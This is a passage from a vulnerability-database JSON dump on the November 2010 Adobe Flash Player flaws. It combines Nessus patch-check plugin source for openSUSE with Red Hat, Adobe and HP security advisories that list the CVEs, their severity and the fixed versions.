audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"flash-player-10.1.102.64-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:18", "description": "Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976", "edition": 23, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : flash-player (flash-player-3474)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2011-05-05T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_1_FLASH-PLAYER-101104.NASL", "href": "https://www.tenable.com/plugins/nessus/53658", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-3474.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53658);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", 
\"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n\n script_name(english:\"openSUSE Security Update : flash-player (flash-player-3474)\");\n script_summary(english:\"Check for the flash-player-3474 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"flash-player-10.1.102.64-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-05-29T14:34:09", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3636", "CVE-2010-3639", "CVE-2010-3640", "CVE-2010-3641", "CVE-2010-3642", 
"CVE-2010-3643", "CVE-2010-3644", "CVE-2010-3645", "CVE-2010-3646", "CVE-2010-3647", "CVE-2010-3648", "CVE-2010-3649", "CVE-2010-3650", "CVE-2010-3652", "CVE-2010-3654"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed on the Adobe security page APSB10-26, listed\nin the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially-crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially-crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644,\nCVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\nCVE-2010-3650, CVE-2010-3652, CVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain server\nencodings could lead to a bypass of cross-domain policy file restrictions,\npossibly leading to cross-domain information disclosure. 
(CVE-2010-3636)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 9.0.289.0.\n", "modified": "2017-07-22T04:32:45", "published": "2010-11-08T05:00:00", "id": "RHSA-2010:0834", "href": "https://access.redhat.com/errata/RHSA-2010:0834", "type": "redhat", "title": "(RHSA-2010:0834) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:35:44", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3636", "CVE-2010-3639", "CVE-2010-3640", "CVE-2010-3641", "CVE-2010-3642", "CVE-2010-3643", "CVE-2010-3644", "CVE-2010-3645", "CVE-2010-3646", "CVE-2010-3647", "CVE-2010-3648", "CVE-2010-3649", "CVE-2010-3650", "CVE-2010-3652", "CVE-2010-3654"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed on the Adobe security page APSB10-26, listed\nin the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially-crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially-crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644,\nCVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\nCVE-2010-3650, CVE-2010-3652, CVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain server\nencodings could lead to a bypass of cross-domain policy file restrictions,\npossibly leading to cross-domain information disclosure. (CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with Flash\nPlayer on certain sites, such as fullscreen playback on YouTube. 
Despite\nthese regressions, we feel these security flaws are serious enough to\nupdate the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.1.102.64.\n", "modified": "2017-07-27T07:20:44", "published": "2010-11-05T04:00:00", "id": "RHSA-2010:0829", "href": "https://access.redhat.com/errata/RHSA-2010:0829", "type": "redhat", "title": "(RHSA-2010:0829) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:22", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3636", "CVE-2010-3639", "CVE-2010-3640", "CVE-2010-3641", "CVE-2010-3642", "CVE-2010-3643", "CVE-2010-3644", "CVE-2010-3645", "CVE-2010-3646", "CVE-2010-3647", "CVE-2010-3648", "CVE-2010-3649", "CVE-2010-3650", "CVE-2010-3652", "CVE-2010-3654"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed on the Adobe security page APSB10-26, listed\nin the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially-crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially-crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644,\nCVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\nCVE-2010-3650, CVE-2010-3652, CVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain server\nencodings could lead to a bypass of cross-domain policy file restrictions,\npossibly leading to cross-domain information disclosure. 
(CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with Flash\nPlayer on certain sites, such as fullscreen playback on YouTube. Despite\nthese regressions, we feel these security flaws are serious enough to\nupdate the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.1.102.64.\n", "modified": "2018-06-07T09:04:34", "published": "2010-11-10T05:00:00", "id": "RHSA-2010:0867", "href": "https://access.redhat.com/errata/RHSA-2010:0867", "type": "redhat", "title": "(RHSA-2010:0867) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:11", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3654", "CVE-2010-4091"], "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nThis update fixes two vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security page APSB10-28, listed\nin the References section. A specially-crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user running\nAdobe Reader when opened. (CVE-2010-3654, CVE-2010-4091)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 9.4.1, which is not vulnerable to these issues. 
All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\n", "modified": "2018-06-07T09:04:26", "published": "2010-12-01T05:00:00", "id": "RHSA-2010:0934", "href": "https://access.redhat.com/errata/RHSA-2010:0934", "type": "redhat", "title": "(RHSA-2010:0934) Critical: acroread security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Security update available for Adobe Flash Player\r\n\r\nRelease date: November 4, 2010\r\n\r\nVulnerability identifier: APSB10-26\r\n\r\nCVE number: CVE-2010-3636, CVE-2010-3637, CVE-2010-3638, CVE-2010-3639, CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652, CVE-2010-3654, CVE-2010-3976\r\n\r\nPlatform: All Platforms\r\nSummary\r\n\r\nCritical vulnerabilities have been identified in Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and Solaris, and Adobe Flash Player 10.1.95.1 for Android. These vulnerabilities, including CVE-2010-3654 referenced in Security Advisory APSA10-05, could cause the application to crash and could potentially allow an attacker to take control of the affected system.\r\n\r\nAdobe recommends users of Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and Solaris update to Adobe Flash Player 10.1.102.64. 
We expect to make available an update for Flash Player 10.x for Android by November 9, 2010.\r\nAffected software versions\r\n\r\n * Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and Solaris\r\n * Adobe Flash Player 10.1.95.1 for Android\r\n\r\nTo verify the version of Adobe Flash Player installed on your system, access the About Flash Player page, or right-click on content running in Flash Player and select \"About Adobe (or Macromedia) Flash Player\" from the menu. If you use multiple browsers, perform the check for each browser you have installed on your system.\r\nSolution\r\n\r\nAdobe recommends all users of Adobe Flash Player 10.1.85.3 and earlier versions upgrade to the newest version 10.1.102.64 by downloading it from the Adobe Flash Player Download Center. Windows users can install the update via the auto-update mechanism within the product when prompted.\r\n\r\nFor users who cannot update to Flash Player 10.1.102.64, Adobe has developed a patched version of Flash Player 9, Flash Player 9.0.289.0, which can be downloaded from here.\r\nSeverity rating\r\n\r\nAdobe categorizes this as a critical update and recommends affected users update their installations to the newest versions.\r\nDetails\r\n\r\nCritical vulnerabilities have been identified in Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and Solaris, and Adobe Flash Player 10.1.95.1 for Android. 
These vulnerabilities, including CVE-2010-3654 referenced in Security Advisory APSA10-05, could cause the application to crash and could potentially allow an attacker to take control of the affected system.\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-3654).\r\n\r\nThis update resolves an input validation issue vulnerability that could lead to a bypass of cross-domain policy file restrictions with certain server encodings (CVE-2010-3636).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (ActiveX only) (CVE-2010-3637).\r\n\r\nThis update resolves an information disclosure vulnerability (Macintosh platform, Safari browser only) (CVE-2010-3638).\r\n\r\nThis update resolves a Denial of Service vulnerability. Arbitrary code execution has not been demonstrated, but may be possible (CVE-2010-3639).\r\n\r\nThis update resolves multiple memory corruption vulnerabilities that could lead to code execution:\r\n\r\n * (CVE-2010-3640)\r\n * (CVE-2010-3641)\r\n * (CVE-2010-3642)\r\n * (CVE-2010-3643)\r\n * (CVE-2010-3644)\r\n * (CVE-2010-3645)\r\n * (CVE-2010-3646)\r\n * (CVE-2010-3647)\r\n * (CVE-2010-3648)\r\n * (CVE-2010-3649)\r\n * (CVE-2010-3650)\r\n * (CVE-2010-3652)\r\n\r\nThis update resolves a library-loading vulnerability that could lead to code execution (CVE-2010-3976).\r\n\r\nAdobe recommends users of Adobe Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and Solaris update to Adobe Flash Player 10.1.102.64. 
We expect to make available an update for Flash Player 10.x for Android by November 9, 2010.\r\n\r\nAffected software\r\n\t\r\n\r\nRecommended player update\r\n\t\r\n\r\nAvailability\r\n\r\nFlash Player 10.1.85.3 and earlier\r\n\t\r\n\r\n10.1.102.64\r\n\t\r\n\r\nFlash Player Download Center\r\n\r\nFlash Player 10.1.85.3 and earlier - network distribution\r\n\t\r\n\r\n10.1.102.64\r\n\t\r\n\r\nFlash Player Licensing\r\n\r\nFlash Professional CS5, Flash CS4 Professional and Flex 4\r\n\t\r\n\r\n10.1.102.64\r\n\t\r\n\r\nFlash Player Support Center\r\n\r\nFlash CS3 Professional and Flex 3\r\n\t\r\n\r\n9.0.289.0\r\n\t\r\n\r\nFlash Player Support Center\r\n\r\n \r\nAcknowledgments\r\n\r\nAdobe would like to thank the following individuals and organizations for reporting the relevant issues and for working with Adobe to help protect our customers:\r\n\r\n * Tokuji Akamine of Symantec Consulting Services Japan (CVE-2010-3636)\r\n * Xiaopeng Zhang of Fortinet's FortiGuard Labs (CVE-2010-3637)\r\n * Erik Osterholm of Texas A&M University (CVE-2010-3638)\r\n * Matthew Scott Bergin of Smash The Stack and Bergin Pen. 
Testing (CVE-2010-3639)\r\n * Will Dormann of CERT (CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652)\r\n * Simon Raner of ACROS Security (CVE-2010-3976)\r\n", "edition": 1, "modified": "2010-11-08T00:00:00", "published": "2010-11-08T00:00:00", "id": "SECURITYVULNS:DOC:25089", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25089", "title": "Security update available for Adobe Flash Player", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:39", "bulletinFamily": "software", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Multiple memory corruptions, code executions, cross-site access, information leak, DoS.", "edition": 1, "modified": "2010-11-08T00:00:00", "published": "2010-11-08T00:00:00", "id": "SECURITYVULNS:VULN:11239", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11239", "title": "Adobe Flash Player multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2011-1543", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2011-1542", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: 
SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02738731\r\nVersion: 1\r\n\r\nHPSBMA02663 SSRT100428 rev.1 - HP Systems Insight Manager (SIM) for HP-UX, Linux,\r\nand Windows, Remote Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF),\r\nExecution of Arbitrary Code, Denial of Service (DoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as\r\npossible.\r\n\r\nRelease Date: 2011-04-19\r\nLast Updated: 2011-04-19\r\n\r\nPotential Security Impact: Remote cross site scripting (XSS), cross site request\r\nforgery (CSRF), execution of arbitrary code, Denial of Service (DoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified in HP Systems Insight\r\nManager (SIM) for HP-UX, Linux, and Windows. The vulnerabilities could be exploited\r\nremotely resulting in cross site scripting (XSS), cross site request forgery (CSRF),\r\nexecution of arbitrary code, and Denial of Service (DoS).\r\n\r\nReferences: CVE-2010-3636\r\n Adobe Flash Player\r\n\r\nCVE-2010-3637\r\n Adobe Flash Player\r\n\r\nCVE-2010-3638\r\n Adobe Flash Player\r\n\r\nCVE-2010-3639\r\n Adobe Flash Player\r\n\r\nCVE-2010-3640\r\n Adobe Flash Player\r\n\r\nCVE-2010-3641\r\n Adobe Flash Player\r\n\r\nCVE-2010-3642\r\n Adobe Flash Player\r\n\r\nCVE-2010-3643\r\n Adobe Flash Player\r\n\r\nCVE-2010-3644\r\n Adobe Flash Player\r\n\r\nCVE-2010-3645\r\n Adobe Flash Player\r\n\r\nCVE-2010-3646\r\n Adobe Flash Player\r\n\r\nCVE-2010-3647\r\n Adobe Flash Player\r\n\r\nCVE-2010-3648\r\n Adobe Flash Player\r\n\r\nCVE-2010-3649\r\n Adobe Flash Player\r\n\r\nCVE-2010-3650\r\n Adobe Flash Player\r\n\r\nCVE-2010-3652\r\n Adobe Flash Player\r\n\r\nCVE-2010-3976\r\n Adobe Flash Player\r\n\r\nCVE-2011-1542\r\n XSS\r\n\r\nCVE-2011-1543\r\n CSRF\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Systems Insight Manager (SIM) 
for HP-UX, Linux, and Windows prior to v6.3\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2010-3636 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3637 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3638 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\r\nCVE-2010-3639 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3640 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3641 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3642 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3643 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3644 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3645 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3646 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3647 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3648 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3649 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3650 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3652 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2010-3976 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2011-1542 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\r\nCVE-2011-1543 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP SIM v6.3 or subsequent to resolve the vulnerabilities.\r\n\r\nHP SIM v6.3 for HP-UX, Linux, and Windows\r\n\r\nHP SIM v6.3 for HP-UX, Linux, and Windows is available here:\r\nhttp://h18013.www1.hp.com/products/servers/management/hpsim/\r\n\r\nHP SIM v6.3 for Windows on Insight Software DVD\r\n\r\nIn addition for Windows HP SIM v6.3 is available on DVD images. 
These are available\r\nfor download here.\r\nhttp://h18013.www1.hp.com/products/servers/management/fpdownload.html\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nFor HP-UX, install HP SIM v6.3 or subsequent\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that\r\nreplaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP\r\nand lists recommended actions that may apply to a specific HP-UX system. It can also\r\ndownload patches and create a depot automatically. For more information see:\r\nhttps://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS\r\n\r\nHP-UX B.11.23\r\nHP-UX B.11.31\r\n=============\r\nSysMgmtServer.MX-CMS\r\nSysMgmtServer.MX-CORE\r\nSysMgmtServer.MX-CORE-ARCH\r\nSysMgmtServer.MX-CORE-ARCH\r\nSysMgmtServer.MX-PORTAL\r\nSysMgmtServer.MX-REPO\r\nSysMgmtServer.MX-TOOLS\r\naction: install HP SIM v6.3 or subsequent\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nHISTORY\r\nVersion: 1 (rev.1) - 19 April 2011 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed\r\non systems running HP software products should be applied in accordance with the\r\ncustomer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product,\r\nsend Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to\r\nHP be encrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins 
via\r\nEmail:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to\r\nupdate appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain\r\nsystem integrity. HP is continually reviewing and enhancing the security features of\r\nsoftware products to provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the\r\nattention of users of the affected HP products the important security information\r\ncontained in this Bulletin. HP recommends that all users determine the applicability\r\nof this information to their individual situations and take appropriate action. 
